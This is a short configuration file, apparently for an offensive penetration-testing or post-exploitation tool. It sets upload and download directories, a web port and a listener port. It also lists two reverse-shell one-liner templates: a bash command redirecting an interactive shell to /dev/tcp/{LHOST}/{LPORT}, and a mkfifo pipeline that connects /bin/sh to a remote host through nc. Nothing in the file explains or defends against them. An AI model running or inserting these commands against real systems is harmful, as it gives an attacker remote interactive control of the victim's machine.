download_path: ~/up_downloads upload_path: ~/up_uploads web_port: 8000 shell_port: 9001 shells: bash: "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1" mkfifo: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f"